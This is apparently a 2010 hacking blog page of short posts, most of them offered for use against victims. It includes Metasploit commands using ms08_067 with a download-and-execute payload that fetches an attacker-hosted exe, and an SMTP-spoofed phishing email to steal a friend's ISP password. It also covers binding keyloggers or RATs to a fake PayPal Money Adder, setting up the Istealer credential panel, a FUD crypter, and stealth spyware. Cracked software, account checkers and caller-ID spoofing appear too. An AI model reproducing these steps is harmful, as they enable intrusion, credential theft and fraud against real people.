Thursday, December 9, 2010
BSNL 3G Hack(100% working)
Here is a 100 % working trick to unlimited use BSNL 3G at the cost of
Normal GPRS
First of all Buy a normal 2g bsnl's sim card and keep balance 50+ rs.
now activate gprs by sending sms GPRS PRE to 53733 It will be
actrivated in 24 hours, after activation get gprs settings by calling c.care
Now do e-recharge with 230 rs (or whatever unlimited plan exists in your area)
in it, After activation You have to chnage only one thing in yor 3G enabled cell.
Go to settings>tools>settings>phone&g t;network>network mode> now select UMTS
THEN do manual searching for network u will fing bsnl 3g network there wid small 3g logo along wid its name,select it as default
Now see your data singnals logo..... vola it is converted into 3G
You will get near about 500kbps to 1200 kbps speed
Remember use BSNLEGPRS or BSNLPREPAID as ur access point
Email Forging
The SMTP protocol makes it extremely easy for an attacker to send forged emails to a remote user.
Typically an attacker carries out email forging by following steps:
1) Start Command Prompt and type the following command-
c:/>telnet smtp.mailserver.com 25 or c:/>telnet mail.domain.com 25
example:- c:/>telnet smtp.gmail.com 25
The above command opens a telnet connection to the specified remote mail server on port-25. Where port-25 is the default SMTP port on which outgoing mail daemon runs.
2) Once you are connected to the mail daemon of remote mail server, you would be greeted with a message similar to following:-
If you are not familiar with the smtp mail daemon commands then enter the keyword 'help' at daemon which may reveal all the supporting commands as shown below.
3) The correct sequence of commands to be executed is:-
a) helo mailserver1.com
b) mail from:abc@mailserver1.com
c) rcpt to:xyz@mailserver2.com
d) data
e) .(dot command represents end of mail body)
This all as shown in figure below:
EMail forging by this technique does not possible, if mail relying is disabled by it's service provider. |
Monday, November 15, 2010
How to Monitor a Computer from Anywhere - Remote Spy Software
- Employee monitoring- are they doing work or surfing the net?
- Child monitoring - are they viewing adult or pornographic material? Are they chatting with strangers?
- Law enforcement - trying to catch a criminal or a terrorist?

SniperSpy is remotely-deployable spy software. This type of computer program records the activities of children or employees whom use your remote PC. The software can be installed using the Internet by sending an email attachment which contains a module.
When the module is ran by your child or employee, the software silently installs onto your remote PC. It records an array of Internet activities which you'll be able to view in real time. It also allows you to view the full screen and perform control commands.
When you want to view the screen or browse the logged results, simply login to the Secure Online Control Panel and enter your username and password. This panel allows you to view the screen, perform commands, search the logs or uninstall the software.
How the Program Works

SniperSpy Top Features:
- SniperSpy is remotely-deployable spy software
- Invisibility Stealth Mode Option. Works in complete stealth mode. Undetectable!
- Logs All Keystrokes
- Records any Password (Email, Login, Instant Messenger etc.)
- Remote Monitor Entire IM Conversations so that you can spy on IM activities too
- Captures a full-size jpg picture of the active window however often you wish
- Real Time Screen Viewer
- Remotely reboot or shutdown the PC or choose to logoff the current Windows user
- Completely Bypasses any Firewall
Click Here to Download SniperSpy
Download SniperSpy for Mac
Get Web Scanner for Hackers Worth 3195$ for Free
As many as 70% of web sites have vulnerabilities that could lead to the theft of sensitive corporate data such as credit card information and customer lists.
Hackers are concentrating their efforts on web-based applications - shopping carts, forms, login pages, dynamic content, etc. Accessible 24/7 from anywhere in the world, insecure web applications provide easy access to backend corporate databases.
Firewalls, SSL and locked-down servers are futile against web application hacking!
Web application attacks, launched on port 80/443, go straight through the firewall, past operating system and network level security, and right in to the heart of your application and corporate data. Tailor-made web applications are often insufficiently tested, have undiscovered vulnerabilities and are therefore easy prey for hackers.
Acunetix - a world-wide leader in web application security
Acunetix has pioneered the web application security scanning technology: Its engineers have focused on web security as early as 1997 and developed an engineering lead in web site analysis and vulnerability detection.
Acunetix Web Vulnerability Scanner includes many innovative features:
- AcuSensor Technology
- An automatic client script analyzer allowing for security testing of Ajax and Web 2.0 applications
- Industries' most advanced and in-depth SQL injection and Cross site scripting testing
- Advanced penetration testing tools, such as the HTTP Editor and the HTTP Fuzzer
- Visual macro recorder makes testing web forms and password protected areas easy
- Extensive reporting facilities including VISA PCI compliance reports
- Multi-threaded and lightning fast scanner crawls hundreds of thousands of pages with ease
- Intelligent crawler detects web server type and application language
- Acunetix crawls and analyzes websites including flash content, SOAP and AJAX
- Port scans a web server and runs security checks against network services running on the server
Acunetix can be used to fully determine if a website is vulnerable in any way, and it rates the security risk level. It can scan for all the attacks mentioned above to see what its vulnerable, or find allot of useful info about the site as given.

This tool can be used by both white hats and black hats. It worths 3195$ for 1 year!!! I am giving it for free and unlimited time. That's a hell a lot of money.

Install Notes:
- Install acunetix 6.5.
- Replace original files with crack folder content.
- Start wvs.exe and your done.
Top 10 Free RapidShare and Megaupload Premium Link Generators
Rapidshare and Megaupload are the biggest online file sharing services used by almost everyone on the Internet but what makes it annoying is the weird captchas, waiting time and downloading limits.

Using the huge list of Rapidshare Link Generators that I have compiled below, you will be able to use Rapidshare as a premium user. These sites generate premium download links which can be used without any limitations, even with a download manager. Free rapidshare premium link generator help in generating rapidshare premium links without asking for any money. So, even though you don’t have rapidshare premium account, you are able to download rapidshare files at high speed just like Rapidshare premium users. So, i have mentioned below 5 free rapidshare premium link generator sites to help you download rapidshare files at high speed. You just need to insert your URL and the generator will create a valid premium link for you; a link ready for download that can be resumed, paused, accelerated and more.
List of different Rapidshare Premium Link Generators :
1. RapidPremium

How To Use RapidPremium:
- Login with your username and password (if you have a personal account).
- If not, use "public" as the username and password to login to the public account.
- Enjoy Downloading :)
2. RS Generator

This site will allow you to download files from RapidShare with all premium features, but without the expense!. You just need to insert your URL and the generator will create a valid premium link for you; a link ready for download that can be resumed, paused, accelerated and more.
The generated link will be as private as the original RapidShare URL, meaning that it will not be available for distribution, promotion and it will only be available for the author or creator of the premium link. The files will not be hosted in RS Generator servers as it's a stream download and because is property of the user.
3. RapitShare

RapitShare.info is a free RapidShare premium links site where you can download files from RapidShare with all premium features, but it's FREE. You will never need to wait to download a file again, Just type the free link URL in the form, submit and get your premium link! Downloading files of pictures, music, or games has never been easier.
4. FreeRapid

Best file hosting tools in one place!Check rapidshare, megaupload, mediafire, etc. links with our very fast linkchecker.Download files as premium user from rapidshare with our premium link generator. Take your downloads in your own hands and try our new Premium Area.You get bandwidth for filling out surveys. The bandwidth never expires, you can use it whenever you want.
5. RapidIT

Best MegaUpload RapidShare Premium Link Generator at Rapid8.Com!. We also allow you to download any files, using our MegaShares, Easy-Share, MegaVideo, MegaP Video, Hotfile, Uploaded.to, Netload.in, Uploading.com, FileFactory & DepositFiles Premium Link Generator, directly. Use it at work, school and home effortlessly. The best thing is that we are simple to use and you're like having free rapidshare, so check it out and tell your friends!
6. Megaupload Premium Link Generator
7. RS Premium Link Generator
8. RapidsharePremiumLinkGenerator
9. HelloRapid
10. Rapiddownloader
You can also try:
RapidLoader
Megaez
RapidFile
RS Fox
FreeRSLinks
Rapidshare.co.in
How to Hack RapidShare Premium Accounts using RapidShare Hacking Software

Rapidshare Plus ACC will automatically check for the working accounts, so all you got to do is get yourself a list of Rapidshare premium account username and passwords. This is best way to get yourself a working account out of huge lists and it can save a lot of time for you too.
Search google or some hacking forums to find great list of rapidshare account names and passwords, and you can start with your job ;)
Using Rapidshare Plus ACC, you can test all the usernames and passwords of Rapidshare and will list the working accounts in a separate window. The accounts can be inputted with a comma or a new line between 2 accounts.
Download RapidShare Plus ACC
Get CyberGhost VPN Premium for Free
Once online, your movements leave behind a long trail of footprints, allowing others to track your preferences, purchase behavior, transactions, opinions, and much more. Furthermore, there are high chances that they assemble an inaccurate profile.
With its 128-bit SSL encryption, SimonTools CyberGhostVPN2 lets you enter the Internet under the protection of a virtual private network. Your data transmissions and address are concealed, shielding you from spy- and malware.

This VPN service gives you the freedom to express your opinions and feel comfortable when surfing, sharing files, using WLAN, and online banking. Your comings and goings are known only to you, and potential intruders stay out.
CyberGhostVPN - Anonymous, Simple, Secure.
How To Get 1 Year Free Premium CyberGhost VPN
1. First go here.

2. Register and create your account.

3. Now, when you're done with registering click on "Next to step 3"
You can also activate a serial number for your premium subscription here.
And fill in the code: cobiextra

You are done. Now download the client here, and you are ready to use it. Enjoy ;)
How to Hack PayPal Accounts using PayPal Hacking Software
This tutorial is written by Saint Andrew, a loyal reader of this blog.
Note: Hacking credit cards or Bank accounts like PayPal is an illegal act, this is only informational post and I am not responsible for any actions done by you after reading this tutorial. This post is for educational purposes only.
This is fake PayPal Money Adder software to help you bind your keylogger or whatever Trojan server you have. This PayPal Money Adder software seems to be used to Add some Money to your PayPal Account, but actually this is fake PayPal Money Adder software used only as means for installing Trojan Server binded with it on victim computer.
PayPal Money Adder to bind your Trojan Server
1. Download link of Fake PayPal Money Adder is HERE
2. PayPal Money Adder is free fake application which appears to hack PayPal Accounts, now run .exe application to see something like this:

Note: PayPal Money Adder is a FAKE application. It doesn’t add any money to your PayPal Account. It is only used to fool victim and to bind your Trojan server.
3. When you open this, there is a TextBox to type your PayPal Email, and you have to select how much money you want to Add. After that, click on Send Money, and Progress Bar will start.
4. When Progress Bar is full, it will says “Money Has Been Added to your Account Successfully “ as in the Picture below, but it wont add any money to your Account !!!

5. So that is one fake PayPal Money Adder, not one real !!!
6. Now create a keylogger or whatever server (like stealer or RAT), crypt it, and bind with this application. You can use Shock Labs File Binder or Easy Binder. You can find some binders on this blog, just search for it !!!
7. Now, send this binded PayPal Money Adder to your victim and tell him this PayPal Money Adder is used to Add Money to PayPal Accounts. You can use Social Engineering for this. So as long as he runs PayPal Money Adder on his computer, your keylogger server is installed on his computer.
8. Many other Fake Hacking Tools are coming soon, like AlertPay Money Adder, Skype Money Adder, Ultimate Password Cracker, Neobux Hacker and other!!!
(All this fake Hacking tools are coded and created in Visual Basic 2010 by Saint Andrew)
Do you have questions, comments, or suggestions? Feel free to post a comment!
Istealer 6.0 + tutorial
.1 we need the the perfect tool for it that is Istealer 6.0
http://rapidshare.com/files/378891489/New_Folder__3_.rar
NO logger intalled :lol:
.2 we need to register with a good file hosting website with SQl panel
some of them ate
a. www.justfree.com
b. www.blackapplehost.com
c. www.110mb.com
3. No when you finish registration go to
Cpanel > Mysql database and click on create database
create a datbase for e.g. Username_database
and after it create a data base user and put a password for the user that you remember
e.g.
and now we need to ad the user to database
and assign the user privillage
so you can login with it
e.g.
.4 and after doing all this
upload all .php files on the website
.5 Now open the file name
index.php
and change the following
A . Change "suicide_admin" to your MySQL username
B. change "GOX" to your MySQL password
C. change "suicide_is" to your MySQL database name..
D. Change "Admin" to the username you want to log in with..
E. Change "GOV" to the password you want log in with..
and remeber don't change [b]localhost[/b]
6. Now open isteale 6.0
and change the Url:
to yours it will look like this
http://yourname.yourhost.com/index.php
7. U are done now login with user name and you r done........................
plz say thanxx if you like it ......
:D
Use pendrive as RAM
It speeds up your PC and improves application responsiveness by using flash memory and free RAM as an extra layer of performance-boosting cache for your PC. Use up to four inexpensive flash devices to speed up your system. Add more speed to your PC without any hardware upgrade!
DOWNLOAD
Make your computer talk
- Open notepad
- And copy
- And save file as .vbs
- And open it and this will tell you your typed message
How to make autorun CD file
1) You open notepad
2) now you writ: [autorun]
OPEN=INSTALL\Setup_filename.EXE
ICON=INSTALL\Setup_filename.EXE
Now save it but not as a .txt file but as a .inf file.
But remember! The "Setup_filename.EXE" MUST be replaced with the name of the setup file. And you also need to rember that it is not all of the setup files there are called '.exe but some are called '.msi
3) Now burn your CD with the autorun .inf file included.
4) Now set the CD in you CD drive and wait for the autorun to begin or if nothing happens just double-click on the CD drive in
Shutdown with notepad
To Run the 'Shutdown' command from the command prompt, go to 'Start > Run', type 'cmd', and press 'Enter'.
In the black box (the command prompt) type 'Shutdown' and the Switches you want to use with the 'Shutdown' command.
You have to use at least one switch for the shutdown command to work.
The Switches :-
The 'Shutdown' command has a few options called Switches. You can always see them by typing 'shutdown -?' in the command prompt if you forget any of them.
-i: Display GUI interface, must be the first option
-l: Log off (cannot be used with -m option)
-s: Shutdown the computer
-r: Shutdown and restart the computer
-a: Abort a system shutdown
-m \\computername: Remote computer to shutdown/restart/abort
-t xx: Set timeout for shutdown to xx seconds
-c “comment”: Shutdown comment (maximum of 127 characters)
-f: Forces running applications to close without warning
-d [u][p]:xx:yy: The reason code for the shutdown u is the user code p is a planned shutdown code xx is the major reason code (positive integer less than 256) yy is the minor reason code (positive integer less than 65536)
Note :- I’ve noticed using a switch with a '-' sign doesn’t work sometimes.
If you are having trouble try using a '/' in place of '-' in your switches.
Examples :-
shutdown –m \\computername –r –f
This command will restart the computer named computername and force any programs that might still be running to stop.
shutdown –m \\computername –r –f –c “I’m restarting your computer. Please save your work now.” –t 120
This command will restart the computer named computername, force any programs that might still be running to stop, give to user on that computer a message, and countdown 120 seconds before it restarts.
shutdown –m \\computername –a
This command will abort a previous shutdown command that is in progress.
Using A Batch File :-
You can create a file that performs the shutdown command on many computers at one time.
In this example I’m going to create a batch file that will use the shutdown command to shut down 3 computers on my home network before I go to bed.
Open 'Notepad' and type the shutdown command to shut down a computer for each computer on the network.
Make sure each shutdown command is on its own line.
An example of what should be typed in notepad is given below-
shutdown –m \\computer1 –s
shutdown –m \\computer2 –s
shutdown –m \\computer3 -s
Now I’ll save it as a batch file by going to file, save as, change save as type to all files, give the file a name ending with '.bat'. I named mine 'shutdown.bat'.
Pick the location to save the batch file in and save it.
When you run the batch file it’ll shutdown computer 1, 2, and 3 for you.
You can use any combination of shutdown commands in a batch file.
How to Get someones ISP password.(free internet)
1.) run your telnet program:
on windows , go to START -> RUN -> "TELNET".
on linux , you should open a shell , and write telnet.
2.) then connect (on windows "connect" , on linux "open") some anonymous server , if don't have any then search for one , if you are too lame then email me now! i'll give you in the minute! note: you should connect the server mail program (port "25")!
3.) now , write the following :
mail from:[**YOUR FRIEND'S ISP WEBMASTER**]
rcpt to:[**YOUR FRIEND'S EMAIL ADRESS**]
data
Hi there [YOUR FRIEND'S NAME] , this is [NAME OF YOUR FRIEND'S ISP] support team , lately , our server had some problems with the connection and the user-password files were destroyed , a backup was then released , and it was ok.
but yesterday we found out that it is not an updated version of the file , so , it will start charging you for a larger amount of money for each our you use!
- - - - - - - - - - - - - -
To correct the problem , we have made a speical program to correct the error , all YOU have to do is email :
"[**YOUR'S FRIEND'S ISP NAME**]@GalaxyCorp.Com" and in the SUBJECT write your "user name" and "password".
note: No moeny will be returned if you don't follow our instructions!
thank you,
the support team!
4.) press enter twice and then write "."(without the "") and press ENTER!
--
now , the places you saw ** say that maybe you didn't understood it all , so i'll give you a simple example .
[**YOUR FRIEND'S ISP WEBMASTER**] - example , if your friend is connected througe AOL , then type "webmaster@aol.com" , get it?
[**YOUR FRIEND'S EMAIL ADRESS**] - example , if your friend's email is john@aol.com, then type "john@aol.com".
[YOUR FRIEND'S NAME] - if your friend is called "John" then type "John".
[NAME OF YOUR FRIEND'S ISP] - if your friend is connected through AOL(American Online) , then type "American - Online"
"[**YOUR'S FRIEND'S ISP NAME**]@GalaxyCorp.Com" - this is the hard-part , but if you are reading this , then don't worry , you're one step from the end! ..
* launch your WWW browser(MICROSOFT INTERNET EXPLORER\NETSCAPE) , and type "HTTP://www.galaxycorp.com".
* Sign there for an account , now , when they ask you what username you want, then try the closest thing to your ISP name(ex - if your friend is connected thourgh American Online[AOL] then try "aol" or "a_o_l" or "american_online" !)
* and when they ask for your email , type your Real one!!!
now continue in your normal life , and remember to read your email!
if you suddenly get a message from your friend's email adress , and the subject is "john j4o87HnzG" then , guess what , you just saved 10$ a month!
Hacking through IP address
Nmap
Metasploit
First of all you need target ip of your victim.
Then open Metasploit Console & type db_create.
[Use: This’ll create or connect you to database.]
Once you do that type Nmap.
[Use: This’ll load Nmap in Metasploit Console]
Next you need to type db_nmap -sT -sV
[This’ll scan OS, Ports, and Services running on victim’s computer.]
Wait for 5 min’s to complete its scan.
Once done, Note down the OS, Ports, and Services running on victim’s computer.
Now it’s time to exploit victim’s machine.
Exploit depends on the OS, Ports, and Services running on victim’s computer.
So, you’re lucky if you get OS WIN XP or 2000 because it’s easy to exploit them.
No matter weather they’re protected by any firewall or not.
Now I’ll tell you exploiting:-
Windows 2000 (all versions SP1, SP2, SP3, SP4)
Windows XP (all versions SP1, SP2, SP3)
Type show exploits
[Use: This’ll show all the exploits in its database.]
Next you need to type use windows/smb/ms08_067_netapi
[Use: This’ll select the exploit windows/smb/ms08_067_netapi]
Now Type show targets
[Use: This’ll show all targets by exploit]
Now Type set target 0
[Use: This’ll set target to 0 specified]
Then type show payloads
[Use: This’ll bring up all the payloads]
Next type set payload windows/download_exec
[Use: This’ll set payload as windows/download_exec]
Then Type show options
[Use: This’ll show all options in the exploit & payload]
In window you’ll see many options, in which you need to
Fill only two options RHOST & URL.
Type set RHOST
[Use: This’ll set RHOST (victim’s ip) to xxx.xxx.xxx.xxx]
Next Type set URL http://www.xxxx.com/xxx.exe
[Use: This’ll set URL to your direct server link.]
At last you need to type exploit
[Use: This will launch your exploit & your victim will be infected.]
You can now control you're victim with RAT.
So, any versions of Win 2000-XP can be exploited easily.
In case if you didn’t get this two OS’, immediately after Nmap scan
You can use the command db_autopwn –p –t –e.
In most cases you get a shell.
HOw to create a FTP server on your pc
Serv-U
No-IP.com Website
Quote:
Step 1. Getting a static IP address.
Get a static address for your FTP server. You will want to do this as opposed to using your IP address for several reasons. First, it’s easier keeping up-to-date. Imagine having to change all of your setting every time your IP changed. With No-IP, the No-IP service runs in background on your computer and updates your current IP address with your FTP server’s URL (for example, you get ftp://rkchoolie.serveftp.com). Second reason, you don’t want your IP address posted out there for everyone to see.
1. Go to http://www.No-IP.com to create a new user account.
2. Fill in the information that is required and the click Register button.
3. Your account has now been created and your account password has been emailed to you.
4. Check your email mailbox and wait for the mail that contains your password
5. Go back to http://www.No-IP.com and type your email address and password to login to your account.
6. Once in your account, click on Add a host in the left menu
7. Type in the Hostname you want (example: rkchoolie) and pick a Domain from the list (example: ftpserve.com)
8. Check Allow Wildcards and click the Submit button
9. You now have your static address (example: rkchoolie.serveftp.com)
10. Click on your OS link in the Dyn-Update Client in the bottom right menu and follow links to download the client
11. Once downloaded, install the software and type in your email address and password when asked.
12. Finally tick the checkbox near your static address.
You now have a static web address .
Quote:
Step 2. Installing and setting the FTP server
1. Install Serv-U 4.0.
2. Start Serv-U and use the wizard to setup your ftp.
3. Click next until you're asked for an IP address, leave it blank and then click next.
4. Type the domain name you've just registered above (example: preacher.serveftp.com) in the domain name field and then click Next.
5. You are asked if you want to allow anonymous access, select No and then click next.
6. You are then asked to create a named account, check yes and then click next.
7. Type in the user name you wish for this account (example: Harrie) and click next.
8. Type a password for this account (example: $p3c1aL). For security reasons, try to create a password with some letters, numbers and special characters. Then click next.
9. You will then be asked for the Home directory of the account you just created. Select the directory and then click next.
10. Select yes to lock this account to the Home directory. You want to do this so that the user can not go any further up that his home directory. Click next.
11. The account is now set so click finish.
Quote:
Step 3. Configuring user accounts
1. In the left tree-menu, select the account you've just created and then click on the General tab.
2. Check Hide ‘Hidden’ Files.
3. Check Allow only and enter the number one in the box.
4. Set the Max. download speed to what ever you want. If this is an account that many will be using, set it low to save on your bandwidth. I usually have mine set between 10 – 20. If you leave it blank, users will be able to download from you at full bandwidth.
5. Set the Max no. of users to how many you want to be able to log on at one time. This depends on your connection speed but try these (56 - 1, ISDN - 3, ADSL or cable - 5-6 users.)
6. Now, click on the Dir Access tab.
7. You should see the home folder in there. Highlight it and make your permissions.
8. If you only want users to be able to download check only Read, List, & Inherit.
9. If you want users to be able to upload, but to only one particular folder but not download, click the add button and then select that folder. Now highlight the folder and set these permissions on that folder. Check Write, Append, List, Create, & Inherit. Once you have made the permissions click on the up arrow that is located at the bottom right-hand corner. You want this special upload folder to be list first, before the home folder.
10. If there is a folder that you don’t want anyone to have access to, but it is inside the home folder, then click the add button and then select that folder. Now highlight the folder and make sure that all checkboxes are left. Once you have made the permissions click on the up arrow that is located at the bottom right-hand corner. You want this no access folder to be listed at the very top.
11. There are many other different sets of permissions you can play with. I just covered your basics.
12. Your server is now set!
13. Try logging on with the username and password and see if it works.
How to boost your views on website or any thing
http://uploading.com/files/d5e5eb97/tag.txt/
Step 2::When you insert your link, make sure you take out the brackets, now click on the file you just saved as a (.html) or (.htm) and when all the boxes load up, make sure you just refresh, now for every line of the < iframe src... > you get one view
Step 3:Now save it in notepad as an .html document. The name doesn't matter, make sure you save it as all formats, and the filename ends in (.html.)
NOw put this frames in wherever you want and you get maximum hit on your pay per link or youtube videos ....
HOw to bypass 60 sec on deposite file
1. Go to the link of the file you want to download. You can use any link for testing.
2. Click free downloading
3. as soon as the countdown starts right click anywhere and click view page source
4. Press CTRL + F and search for download_url
5. After the first match look a little below that and you'll see the direct link to the file hosted on their site.
6. Copy and paste that link into your browser
7. Begin downloading Superman
How to download multiple files at once:
1. Open all the files you want in seperate tabs
2. Click free downloading on all of them one by one. It won't detect you're doing it to more than one file yet because you didn't start downloading anything.
3. Repeat steps 3-7 on all of them
Well that's it, use this while it lasts because chances are they'll patch it pretty soon. Have fun
How to set up proxy server
* Web Host
In theory, any webhost will do, if they comply with the other requirements; an old computer in your basement, or even a free online webhost.
* PHP5 or greater and cURL
Look for this on the website of your webhost. If it’s paid hosting, you can almost count on it. Especially cURL is a feature that’ll be disabled on most free webservers.
* Permission
That’s right. Some webhosts will explicitly forbid you to create a proxy server (or a chat room, for that matter) in their terms of content. And you can expect them to find out.
1. Download and Install GlypeProxy
GlypeProxy is a free, standalone PHP script. That means it’s lightweight and incredibly easy to configure. You can download it from their website.
Next, upload the files to a sub directory on your webserver. If you see a folder called ‘www’, or called after your domain name (e.g. domain.com) create the sub folder in there. You need to avoid using the word ‘proxy’, because some companies pick up on it. Instead, use ‘web’ or ’surf’.
There are a few different ways to upload your files. If you already know this, skip to the next paragraph. Here they are arranged from the least to the most effort.
* Upload and unpack ZIP
Look in the filemanager for an ‘unpack’ or ‘extract’ option. You can then upload it in one take. This is not always supported.
* FTP access
Use an FTP application to access your webhost, and let it transfer the files while you fetch some more coffee. Most often supported.
* Manual upload
You really don’t want to do this – are you sure the previous two alternatives are blanked out? Your last resolve will be to manually upload all the files and folder structures. Or start looking for a different host – it might not be such a bad idea.
2. Ready For Use
There’s no real set-up needed. Just point your browser to the directory where you put all those files (ex. domain.com/surf) and GlypeProxy will pop up. If you don’t like the logo, you’ll have to replace it manually. But if you want a proxy server for personal use, some little branding won’t matter.
Users can enter any URL and, after expanding the options, choose to encode the URL, the page, allow cookies, scripts and objects. Encoding the page can help you access some sites that are still being picked up and intercepted, but might give you a corrupt webpage at times.
3. Admin Preferences
Although Glype is a powerful proxy script, the admin tools are obviously the backing power. You might not know this, but a lot of online proxy tools are powered by Glype, just like the one you just set up. The admin preferences leave room not only for customization, but for improvement. You can assign site-specific code for trouble-giving websites, and change user-agent and proxy lists.
Most useful to novice users will be the caching tools (pictured above), logs, and blacklists. The caching tools can help you improve the browsing speed by storing some files from all, or some of the already visited websites. Logs are off by default, but might have legal importance in the future, depending on who uses your proxy server. Always explicitly mention you’re keeping these logs. Finally, the blacklists will allow you to block (all but) a few sites, or users.
To access your admin panel, point your browser to admin.php on your webserver (e.g. domain.com/surf/admin.php).
Are you setting up your own personal proxy server? Do you have any other tips or experiences on the issue? Let us know in the comments below!
Learn few linux command
Accessing_Windows_Partiton_In_Rhel_4.rar
Acl__Access_Control_List_.rar
Assigning_Ip_Address_To_The_Host.rar
Auto_Mounter.rar
Changing_Default_Run_Level.rar
Changing_Host_Name.rar
Changing_Run_Level_At_Startup.rar
Changing_Run_Level_Using_Init_And_Telinit.rar
Creating_And_Mounting_Iso_File_System.rar
Creating_Swap_Partition_And_Swap_File.rar
Dhcp_Configuration.rar
Displaying_Message_On_Login.rar
Dns_Configuration.rar
Ftp_Server_Configuration.rar
Installing_Google_Earth.rar
Installing_Kernel.rar
Installing_Nero_Linux.rar
Installing_Tar_Ball_-_Mp3_Blaster.rar
Job_Scheduling_Using_At_Command.rar
Locking_And_Unlocking_Terminals.rar
Lvm__Logical_Volume_Manager_.rar
Nfs_Server_Configuration.rar
Recovering_Root_Password.rar
Remote_Login_Using_Ssh.rar
Rpm_Installation.rar
Rpm_Installation_And_Downloading_File_From_Ftp_Server
Samba_Server_Configuration.rar
Secure_Copy_From_Remote_Server.rar
Service_Commands_And_Files.rar
Sytem_Information_Gathering_Commands.rar
Techsmith_Screen_Capure_Codec.rar
Troubleshooting_Fstab.rar
Troubleshooting_Mouse.rar
Troubleshooting_X-Windows.rar
Using_Cat_Command_To_Create_Append_Dsiplay_File.rar
Using_Chkconfig.rar
Using_Fdisk_And_E2label_Command.rar
Using_Tar.rar
Using_Vi_Editor.rar
Visudo.rar
VIdeo files no audio
How to make (.mov) virus
NotePad++
And My .Mov File
WinRar
Download Links
http://adf.ly/9gGn (notepad++)
http://adf.ly/9gHh (basefile 4mb + Quicktime .ico) <--- MUST HAVE
How To Make It Open Your Link
Step 1.
Download The BaseFile And Notepad++ if Dont Have And Extract
Step 2.
Right Click "BaseFile 4mb.mov" And Click "Edit With Notepad++"
Step 3.
When In Notepad++ Hit CTRL+F A Menu Should Pop Up Looking Like This
In Find Search Google Then Replace With Your Direct Download Link
Step 4.
To Shrink Link And Put In The (.mov) File
How To Call Your Friends From THeir Own Cell Number
How To Call Your Friends From THeir Own Cell Number".
1. Go to http://www.mobivox.com and register there for free account.
2. During registration, remember to insert Victim mobile number in "Phone number" field as shown below.
3. Complete registration and confirm your email id and then login to your account. Click on "Direct WebCall".
4. You will arrive at page shown below. In "Enter a number" box, select your country and also any mobile number(you can enter yours). Now, simply hit on "Call Now" button to call your friend with his own number.
5. That's it. Your friend will be shocked to see his own number calling him. I have spent last two days simply playing this cool mobile hack prank.
How To Download Hotfile Link using IDM


Thursday, October 28, 2010
Extract Files from Password Protected RAR Files
Winrar Unlock
Unlock locked winrar archive (including SFX) allowing you to modify the content freely. With Winrar archive lock to prevent modification, people cannot change the content/comment in it. Through some patching of few bytes, you are able to modify your archive with ease.
Download Winrar Unlock: Link
RAR Password Cracker
This program is intended to recover lost passwords for RAR/WinRAR archives of versions 2.xx and 3.xx. The program finds by the method of exhaustive search all possible combinations of characters (“bruteforce” method), or using passwords from lists (“wordlist” or “dictionary” method). Self-extracting archives and multivolume archives are supported.
Download RAR Password Cracker: Link
The program is able to save a current state (you can interrupt the program at any time, and restart from the same state later).
Hack Keylogger Server File
A Tutorial to find keylogger server files:
Now a days in internet there are lots of software available and its a huge collection. Free softwares have no problem , u can download it from official site as its free. But The problem araises when you download a cracked verison of paid softwares. There are hackers who bind keyloggers with the paid softwares and they post in the blogs, warez sites, etc. By downloading and installing these softs, it will harm ur pc and also ur privacy is lost as its detects keystrokes and your passes are stolen.
So now the question arises, whether we can download cracked version of the paid softwares or is there any way to check that it is keylogged or binded.
The answer is Yes, You can test the software u downloaded is whether a keylogger binded or its clean by the following method.
Detecting of Keylogged binded softwares.
Tools needed:
- A program like hex editing software to view the .exe file.The best one is the Bintext.
Here You can download the Bintext software.
Procedure:
Ø Take the software which you suspect to a separate place and open it with the Bintext.(here I downloaded a craked version of IDM which I suspect to be keylogged)
Ø Open the bintext software and browse the the file you suspect and click Go button.
Ø Usually keylogged servers have email and passes in it, so scroll down until you get the email address and passes.
Ø In the above screen shot , I have found the gmail user name(xxxhacker@gmail.com) and its pass.(thedevil) So what I suspected is right. This file is keylogged.
Ø So, by this simple method you can find the files whether it is keylogged or not
$[L] Crypter
$L Crypter [ FUD ] . RUNTIME + SCANTIME . Only scan ur crypted file on http://scanner.novirusthanks.org/ By checking the Do not distribute option, to keep this crypter FUD. Never scan on virustotal or others.
Source : HF
How To Hack Into Others Pc [ RAT ] [Poison ivy ]
Why you would want to use it:
You could setup your home computer to start/stop autobuying while being at work. And do all sorts of other things as well. Screenshots, webcam, keylogger, microphone recorder, it’s all there. Limited by the computers upload speed obviously though.